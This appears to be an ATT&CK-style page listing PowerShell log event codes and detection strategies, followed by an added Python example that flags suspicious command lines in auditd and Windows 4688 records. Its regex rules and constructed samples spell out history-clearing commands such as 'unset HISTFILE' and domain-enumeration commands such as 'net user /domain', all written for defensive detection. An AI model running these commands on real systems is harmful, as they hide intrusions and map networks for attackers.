WinEventLog:PowerShell EventCode=4104
WinEventLog:PowerShell CommandLine=copy-item or robocopy from UNC path
WinEventLog:PowerShell PowerShell launched from outlook.exe or triggered without user invocation
WinEventLog:PowerShell EventCode=4103,4104
WinEventLog:PowerShell EventCode=4103
WinEventLog:PowerShell Execution of PowerShell script to enumerate or remove malicious Home Page folder config
WinEventLog:PowerShell Exchange Cmdlets
WinEventLog:PowerShell CmdletName: Get-Recipient, Get-User
WinEventLog:PowerShell Execution of 'Get-WmiObject Win32_Product' or similar PowerShell cmdlets
WinEventLog:PowerShell EventCode=4103,4104,4105,4106
WinEventLog:PowerShell Execution of PowerShell without -NoProfile flag
WinEventLog:PowerShell EventCode=4101
WinEventLog:PowerShell EventCode=4105
WinEventLog:PowerShell EventCode=4106
WinEventLog:PowerShell EventCode=4103, 4104
WinEventLog:PowerShell EventCode=4104

Detection Strategy

ID Name Technique Detected
DET0413 Abuse of Information Repositories for Data Collection T1213
DET0455 Abuse of PowerShell for Arbitrary Execution T1059.001
DET0120 Account Access Removal via Multi-Platform Audit Correlation T1531
DET0182 Behavior-chain detection for T1135 Network Share Discovery across Windows, Linux, and macOS T1135
DET0151 Behavior-chain, platform-aware detection strategy for T1124 System Time Discovery T1124
DET0197 Behavior-chain, platform-aware detection strategy for T1125 Video Capture T1125
DET0329 Behavioral Detection for T1490 - Inhibit System Recovery T1490
DET0142 Behavioral Detection of CLI Abuse on Network Devices T1059.008
DET0251 Behavioral Detection of Cloud Group Enumeration via API and CLI Access T1069.003
DET0516 Behavioral Detection of Command and Scripting Interpreter Abuse T1059
DET0165 Behavioral Detection of Command History Clearing T1070.003
DET0360 Behavioral Detection of Domain Group Discovery T1069.002
DET0010 Behavioral Detection of Event Triggered Execution Across Platforms T1546
DET0357 Behavioral Detection of Internet Connection Discovery T1016.001
DET0266 Behavioral Detection of Mailbox Data and Log Deletion for Anti-Forensics T1070.008
DET0078 Behavioral Detection of Malicious Cloud API Scripting T1059.009
DET0140 Behavioral Detection of Malicious File Deletion T1070.004
DET0127 Behavioral Detection of Masquerading Across Platforms via Metadata and Execution Discrepancy T1036
DET0049 Behavioral Detection of Network History and Configuration Tampering T1070.007
DET0103 Behavioral Detection of Network Share Connection Removal via CLI and SMB Disconnects T1070.005
DET0378 Behavioral Detection of Obfuscated Files or Information T1027
DET0179 Behavioral Detection of Permission Groups Discovery T1069
DET0008 Behavioral Detection of Remote Cloud Logins via Valid Accounts T1021.007
DET0596 Behavioral Detection of Remote SSH Logins Followed by Post-Login Execution T1021.004
DET0521 Behavioral Detection of Spoofed GUI Credential Prompts T1056.002
DET0195 Behavioral Detection of System Network Configuration Discovery T1016
DET0384 Behavioral Detection of Unix Shell Execution T1059.004
DET0093 Behavioral Detection of User Discovery via Local and Remote Enumeration T1033
DET0076 Behavioral Detection of Visual Basic Execution (VBS/VBA/VBScript) T1059.005
DET0464 Behavioral Detection of Wi-Fi Discovery Activity T1016.002
DET0052 Behavioral Detection Strategy for Abuse of Sudo and Sudo Caching T1548.003
DET0131 Behavioral Detection Strategy for Exfiltration Over Alternative Protocol T1048
DET0503 Behavioral Detection Strategy for Exfiltration Over Symmetric Encrypted Non-C2 Protocol T1048.001
DET0269 Behavioral Detection Strategy for Remote Service Logins and Post-Access Activity T1021
DET0386 Cloud Account Enumeration via API, CLI, and Scripting Interfaces T1087.004
DET0083 Container CLI and API Abuse via Docker/Kubernetes (T1059.013) T1059.013
DET0591 Cross-Platform Behavioral Detection of File Timestomping via Metadata Tampering T1070.006
DET0063 Cross-Platform Behavioral Detection of Python Execution T1059.006
DET0094 Cross-Platform Behavioral Detection of Scheduled Task/Job Abuse T1053
DET0264 Cross-Platform Detection of JavaScript Execution Abuse T1059.007
DET0333 Cross-Platform Detection of Scheduled Task/Job Abuse via `at` Utility T1053.002
DET0198 Detect Abuse of Container APIs for Credential Access T1552.007
DET0535 Detect Abuse of vSphere Installation Bundles (VIBs) for Persistent Access T1505.006
DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence T1197
DET0412 Detect Access or Search for Unsecured Credentials Across Platforms T1552
DET0307 Detect Access to Unsecured Credential Files Across Platforms T1552.001
DET0275 Detect Adversary Deobfuscation or Decoding of Files and Payloads T1140
DET0526 Detect Archiving and Encryption of Collected Data (T1560) T1560
DET0438 Detect Archiving via Custom Method (T1560.003) T1560.003
DET0268 Detect Archiving via Library (T1560.002) T1560.002
DET0298 Detect Archiving via Utility (T1560.001) T1560.001
DET0523 Detect Code Signing Policy Modification (Windows & macOS) T1553.006
DET0060 Detect Ingress Tool Transfers via Behavioral Chain T1105
DET0589 Detect Modification of Authentication Process via Reversible Encryption T1556.005
DET0050 Detect Persistence via Malicious Office Add-ins T1137.006
DET0095 Detect Persistence via Malicious Outlook Rules T1137.005
DET0519 Detect Persistence via Office Template Macro Injection or Registry Hijack T1137.001
DET0315 Detect Persistence via Office Test Registry DLL Injection T1137.002
DET0029 Detect Persistence via Outlook Custom Forms Triggered by Malicious Email T1137.003
DET0177 Detect Persistence via Outlook Home Page Exploitation T1137.004
DET0048 Detect Remote Email Collection via Abnormal Login and Programmatic Access T1114.002
DET0452 Detect Subversion of Trust Controls via Certificate, Registry, and Attribute Manipulation T1553
DET0549 Detect Suspicious Access to Private Key Files and Export Attempts Across Platforms T1552.004
DET0057 Detect Suspicious Access to securityd Memory for Credential Extraction T1555.002
DET0420 Detect User Activity Based Sandbox Evasion via Input & Artifact Probing T1497.002
DET0361 Detecting .NET COM Registration Abuse via Regsvcs/Regasm T1218.009
DET0433 Detecting Code Injection via mavinject.exe (App-V Injector) T1218.013
DET0350 Detecting Downgrade Attacks T1562.010
DET0044 Detecting Malicious Browser Extensions Across Platforms T1176.001
DET0222 Detecting MMC (.msc) Proxy Execution and Malicious COM Activation T1218.014
DET0440 Detecting PowerShell Execution via SyncAppvPublishingServer.vbs Proxy Abuse T1216.002
DET0528 Detecting Remote Script Proxy Execution via PubPrn.vbs T1216.001
DET0034 Detection of Adversarial Process Discovery Behavior T1057
DET0223 Detection of Adversary Abuse of Software Deployment Tools T1072
DET0097 Detection of Application Window Enumeration via API or Scripting T1010
DET0734 Detection of Automated Collection T0802
DET0554 Detection of Bluetooth-Based Data Exfiltration T1011.001
DET0444 Detection of Command and Control Over Application Layer Protocols T1071
DET0655 Detection of Command and Scripting Interpreter T1623
DET0760 Detection of Command-Line Interface T0807
DET0671 Detection of Data Destruction T1662
DET0758 Detection of Data Destruction T0809
DET0146 Detection of Data Destruction Across Platforms via Mass Overwrite and Deletion Patterns T1485
DET0123 Detection of Data Exfiltration via Removable Media T1052
DET0749 Detection of Data from Local System T0893
DET0014 Detection of Data Staging Prior to Exfiltration T1074
DET0426 Detection of Direct Volume Access for File System Evasion T1006
DET0145 Detection of Disabled or Modified System Firewalls across OS Platforms. T1562.004
DET0007 Detection of Domain Trust Discovery via API, Script, and CLI Enumeration T1482
DET0077 Detection of Exfiltration Over Alternate Network Interfaces T1011
DET0512 Detection of Exfiltration Over Asymmetric Encrypted Non-C2 Protocol T1048.002
DET0149 Detection of Exfiltration Over Unencrypted Non-C2 Protocol T1048.003
DET0416 Detection of File Transfer Protocol-Based C2 (FTP, FTPS, SMB, TFTP) T1071.002
DET0772 Detection of Graphical User Interface T0823
DET0750 Detection of Indicator Removal on Host T0872
DET0745 Detection of Lateral Tool Transfer T0867
DET0434 Detection of Launch Agent Creation or Modification on macOS T1543.001
DET0013 Detection of Local Browser Artifact Access for Reconnaissance T1217
DET0380 Detection of Local Data Collection Prior to Exfiltration T1005
DET0261 Detection of Local Data Staging Prior to Exfiltration T1074.001
DET0138 Detection of Malicious Code Execution via InstallUtil.exe T1218.004
DET0092 Detection of Malicious or Unauthorized Software Extensions T1176
DET0328 Detection of Malicious Profile Installation via CMSTP.exe T1218.003
DET0439 Detection of Malware Relocation via Suspicious File Movement T1070.010
DET0725 Detection of Masquerading T0849
DET0215 Detection of Multi-Platform File Encryption for Impact T1486
DET0770 Detection of Network Connection Enumeration T0840
DET0800 Detection of Network Sniffing T0842
DET0040 Detection of Persistence Artifact Removal Across Host Platforms T1070.009
DET0445 Detection of Proxy Infrastructure Setup and Traffic Bridging T1090
DET0209 Detection of Registry Query for Environmental Discovery T1012
DET0071 Detection of Remote Data Staging Prior to Exfiltration T1074.002
DET0079 Detection of Remote Service Session Hijacking T1563
DET0804 Detection of Remote Services T0886
DET0751 Detection of Screen Capture T0852
DET0466 Detection of Script-Based Proxy Execution via Signed Microsoft Utilities T1216
DET0735 Detection of Scripting T0853
DET0897 Detection of Selective Exclusion T1679
DET0765 Detection of Service Stop T0881
DET0793 Detection of System Binary Proxy Execution T0894
DET0320 Detection of System Network Connections Discovery Across Platforms T1049
DET0571 Detection of System Process Creation or Modification Across Platforms T1543
DET0483 Detection of System Service Discovery Commands Across OS Platforms T1007
DET0253 Detection of Systemd Service Creation or Modification on Linux T1543.002
DET0458 Detection of Trust Relationship Modifications in Domain or Tenant Policies T1484.002
DET0607 Detection of Unix Shell T1623.001
DET0791 Detection of User Execution T0863
DET0027 Detection of Web Protocol-Based C2 Over HTTP, HTTPS, or WebSockets T1071.001
DET0237 Detection Strategy for Boot or Logon Initialization Scripts: RC Scripts T1037.004
DET0545 Detection Strategy for Cloud Administration Command T1651
DET0505 Detection Strategy for Command Obfuscation T1027.010
DET0065 Detection Strategy for Container Administration Command Abuse T1609
DET0349 Detection Strategy for Content Injection T1659
DET0108 Detection Strategy for Data Encoding in C2 Channels T1132
DET0579 Detection Strategy for Device Driver Discovery T1652
DET0062 Detection Strategy for Disable or Modify Linux Audit System T1562.012
DET0316 Detection Strategy for Disk Content Wipe via Direct Access and Overwrite T1561.001
DET0297 Detection Strategy for Disk Structure Wipe via Boot/Partition Overwrite T1561.002
DET0137 Detection Strategy for Disk Wipe via Direct Disk Access and Destructive Commands T1561
DET0569 Detection Strategy for Downgrade System Image on Network Devices T1601.002
DET0192 Detection Strategy for Email Hiding Rules T1564.008
DET0558 Detection Strategy for ESXi Hypervisor CLI Abuse T1059.012
DET0555 Detection Strategy for Event Triggered Execution via emond on macOS T1546.014
DET0015 Detection Strategy for Exclusive Control T1668
DET0548 Detection Strategy for Exfiltration Over Web Service T1567
DET0153 Detection Strategy for Exfiltration Over Webhook T1567.004
DET0570 Detection Strategy for Exfiltration to Cloud Storage T1567.002
DET0318 Detection Strategy for Exfiltration to Code Repository T1567.001
DET0284 Detection Strategy for Exfiltration to Text Storage Sites T1567.003
DET0406 Detection Strategy for Extended Attributes Abuse T1564.014
DET0495 Detection Strategy for Financial Theft T1657
DET0055 Detection strategy for Group Policy Discovery on Windows T1615
DET0502 Detection Strategy for Hidden Artifacts Across Platforms T1564
DET0461 Detection Strategy for Hidden File System Abuse T1564.005
DET0032 Detection Strategy for Hidden Files and Directories T1564.001
DET0353 Detection Strategy for Hidden User Accounts T1564.002
DET0321 Detection Strategy for Hidden Virtual Instance Execution T1564.006
DET0128 Detection Strategy for Hidden Windows T1564.003
DET0067 Detection Strategy for Ignore Process Interrupts T1564.011
DET0317 Detection Strategy for Impair Defenses Across Platforms T1562
DET0239 Detection Strategy for Impair Defenses Indicator Blocking T1562.006
DET0563 Detection Strategy for Impair Defenses via Impair Command History Logging across OS platforms. T1562.003
DET0286 Detection Strategy for Impersonation T1656
DET0568 Detection Strategy for Input Injection T1674
DET0450 Detection Strategy for Kernel Modules and Extensions Autostart Execution T1547.006
DET0183 Detection Strategy for Lateral Tool Transfer across OS platforms T1570
DET0255 Detection Strategy for Log Enumeration T1654
DET0101 Detection Strategy for Lua Scripting Abuse T1059.011
DET0170 Detection Strategy for Modify System Image on Network Devices T1601
DET0233 Detection Strategy for Network Device Configuration Dump via Config Repositories T1602.002
DET0314 Detection Strategy for Network Sniffing Across Platforms T1040
DET0469 Detection Strategy for Patch System Image on Network Devices T1601.001
DET0109 Detection Strategy for Plist File Modification (T1647) T1647
DET0533 Detection Strategy for Poisoned Pipeline Execution via SaaS CI/CD Workflows T1677
DET0417 Detection Strategy for Power Settings Abuse T1653
DET0451 Detection Strategy for PowerShell Profile Persistence via profile.ps1 Modification T1546.013
DET0408 Detection Strategy for Reflection Amplification DoS (T1498.002) T1498.002
DET0574 Detection Strategy for Remote System Enumeration Behavior T1018
DET0584 Detection Strategy for Resource Forking on macOS T1564.009
DET0126 Detection Strategy for SSH Key Injection in Authorized Keys T1098.004
DET0240 Detection Strategy for Steal or Forge Authentication Certificates T1649
DET0056 Detection Strategy for Subvert Trust Controls via Install Root Certificate. T1553.004
DET0565 Detection Strategy for System Language Discovery T1614.001
DET0043 Detection Strategy for System Location Discovery T1614
DET0265 Detection Strategy for System Services: Launchctl T1569.001
DET0073 Detection Strategy for System Services: Systemctl T1569.003
DET0583 Detection Strategy for T1136 - Create Account across platforms T1136
DET0046 Detection Strategy for T1497 Virtualization/Sandbox Evasion T1497
DET0547 Detection Strategy for T1505 - Server Software Component T1505
DET0166 Detection Strategy for T1505.002 - Transport Agent Abuse (Windows/Linux) T1505.002
DET0278 Detection Strategy for T1542 Pre-OS Boot T1542
DET0582 Detection Strategy for T1542.005 Pre-OS Boot: TFTP Boot T1542.005
DET0375 Detection Strategy for T1546.017 - Udev Rules (Linux) T1546.017
DET0199 Detection Strategy for Virtual Machine Discovery T1673
DET0494 Detection Strategy for Weaken Encryption: Disable Crypto Hardware on Network Devices T1600.002
DET0243 Detection Strategy for Weaken Encryption: Reduce Key Space on Network Devices T1600.001
DET0129 Domain Account Enumeration Across Platforms T1087.002
DET0476 Email Collection via Local Email Access and Auto-Forwarding Behavior T1114
DET0576 Email Forwarding Rule Abuse Detection Across Platforms T1114.003
DET0087 Encrypted or Encoded File Payload Detection Strategy T1027.013
DET0229 Enumeration of Global Address Lists via Email Account Discovery T1087.003
DET0587 Enumeration of User or Account Information Across Platforms T1087
DET0474 Environmental Keying Discovery-to-Decryption Behavioral Chain Detection Strategy T1480.001
DET0075 Internal Proxy Behavior via Lateral Host-to-Host C2 Relay T1090.001
DET0054 Internal Spearphishing via Trusted Accounts T1534
DET0082 Internal Website and System Content Defacement via UI or Messaging Modifications T1491.001
DET0031 Invalid Code Signature Execution Detection via Metadata and Behavioral Context T1036.001
DET0188 Local Storage Discovery via Drive Enumeration and Filesystem Probing T1680
DET0562 Multi-Platform Execution Guardrails Environmental Validation Detection Strategy T1480
DET0299 Multi-Platform File and Directory Permissions Modification Detection Strategy T1222
DET0559 Multi-Platform Shutdown or Reboot Detection via Execution and Host Status Events T1529
DET0392 Multi-Platform Software Discovery Behavior Chain T1518
DET0161 Password Policy Discovery – cross-platform behavior-chain analytics T1201
DET0370 Recursive Enumeration of Files and Directories Across Privilege Contexts T1083
DET0005 Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path T1036.003
DET0527 Right-to-Left Override Masquerading Detection via Filename and Execution Context T1036.002
DET0016 Security Software Discovery Across Platforms T1518.001
DET0110 Setuid/Setgid Privilege Abuse Detection (Linux/macOS) T1548.001
DET0525 System Discovery via Native and Remote Utilities T1082
DET0447 T1136.001 Detection Strategy - Local Account Creation Across Platforms T1136.001
DET0003 T1136.002 Detection Strategy - Domain Account Creation Across Platforms T1136.002
DET0534 TCC Database Manipulation via Launchctl and Unprotected SIP T1548.006
DET0524 Traffic Signaling (Port-knock / magic-packet → firewall or service activation) – T1205 T1205
DET0306 Unauthorized Network Firewall Rule Modification (T1562.013) T1562.013
DET0351 Unix-like File Permission Manipulation Behavioral Chain Detection Strategy T1222.002
DET0340 User Execution – Malicious Copy & Paste (browser/email → shell with obfuscated one-liner) – T1204.004 T1204.004
DET0248 User Execution – Malicious Image (containers & IaaS) – pull/run → start → anomalous behavior (T1204.003) T1204.003
DET0418 Windows DACL Manipulation Behavioral Chain Detection Strategy T1222.001
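Several strategies in the list above (for example DET0563 for command-history impairment, DET0129 for domain account enumeration and DET0574 for remote system enumeration) are only as good as the command-line telemetry they run over. The following is an added example, not code from the ATT&CK page or from any of the listed detection strategies: it normalises two shapes of command-execution record (an auditd EXECVE record and the "Process Command Line" field of a Windows 4688 event) into one command line and matches it against a small rule set keyed to those three DET IDs. The sample records are constructed, and the regular-expression patterns, the record formats assumed for the samples and the DET-to-pattern mapping are this example's own assumptions rather than ATT&CK content.

```python
"""Command Execution telemetry triage (added example, not ATT&CK code).

Normalises auditd EXECVE records and Windows 4688 'Process Command Line'
fields into one command line and matches it against rules keyed to three
detection strategies from the list above. Patterns and sample records are
assumptions constructed for this example.
"""
import re
import shlex
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    det_id: str         # detection strategy ID from the list above
    technique: str      # ATT&CK technique it covers
    pattern: re.Pattern


# Assumed patterns; a production rule set would be broader and tuned per estate.
RULES = [
    Rule("DET0563", "T1562.003",   # impair command history logging
         re.compile(r"unset\s+HISTFILE|HISTFILE=/dev/null|HISTSIZE=0|set\s+\+o\s+history|history\s+-c")),
    Rule("DET0129", "T1087.002",   # domain account enumeration
         re.compile(r'\bnet(?:1|\.exe)?"?\s+(?:user|group)\b.*\s/domain\b|\bGet-ADUser\b|\bldapsearch\b', re.I)),
    Rule("DET0574", "T1018",       # remote system enumeration
         re.compile(r'\bnet(?:1|\.exe)?"?\s+view\b|\bnltest(?:\.exe)?"?\s+/dclist\b|\barp\s+-a\b', re.I)),
]

# auditd EXECVE arguments appear as a0="quoted" when printable, or as
# a0=48656C6C6F (hex digits, no quotes) when the value contains spaces,
# quotes or non-printable bytes.
AUDIT_ARG = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
WIN_CMDLINE = re.compile(r"Process Command Line:\s*(.+?)\s*$")


def extract_command_line(record: str):
    """Return the executed command line from a record, or None if it carries none."""
    if record.startswith("type=EXECVE"):
        argv = []
        for m in sorted(AUDIT_ARG.finditer(record), key=lambda m: int(m.group(1))):
            _, quoted, hexed = m.groups()
            # Hex-encoded arguments are exactly where 'unset HISTFILE; id' style
            # payloads end up: decode them or the rule never sees the command.
            argv.append(quoted if quoted is not None
                        else bytes.fromhex(hexed).decode("utf-8", "replace"))
        return shlex.join(argv) if argv else None
    m = WIN_CMDLINE.search(record)
    return m.group(1) if m else None


def match_rules(cmdline: str):
    """Return (det_id, technique) for every rule whose pattern hits the command line."""
    return [(r.det_id, r.technique) for r in RULES if r.pattern.search(cmdline)]


def analyse(records):
    """Run every record through extraction and matching; return (det_id, technique, cmdline) hits."""
    hits = []
    for rec in records:
        cmd = extract_command_line(rec)
        if cmd is None:
            continue
        hits.extend((det, tech, cmd) for det, tech in match_rules(cmd))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    # a2 is 'unset HISTFILE; id', hex-encoded by auditd because of the spaces
    'type=EXECVE msg=audit(1700000000.101:201): argc=3 a0="bash" a1="-c" '
    'a2=756E736574204849535446494C453B206964',
    'type=EXECVE msg=audit(1700000000.102:202): argc=2 a0="ls" a1="-la"',
    'type=SYSCALL msg=audit(1700000000.102:202): arch=c000003e syscall=59 success=yes',
    'EventID=4688 Process Command Line: "C:\\Windows\\System32\\net.exe" user /domain',
    'EventID=4688 Process Command Line: nltest /dclist:corp.example',
]

if __name__ == "__main__":
    for det, tech, cmd in analyse(SAMPLE_RECORDS):
        print(f"{det} ({tech}): {cmd}")
```

Two caveats matter in practice. First, auditd hex-encodes any argument containing a space or quote, so a pipeline that only reads the quoted form silently drops the arguments most worth inspecting; the decoder above handles that case, but very long arguments are additionally split into numbered chunks (a2_len, a2[0], a2[1], ...), which this example does not reassemble. Second, a 4688 event only carries the command line when the "Include command line in process creation events" audit policy is enabled; without it, the Windows rules above have nothing to match on. Shell history files are not a substitute for either source, since T1562.003 exists precisely to switch them off, which is why the execve-level record is the one the history-impairment rule reads.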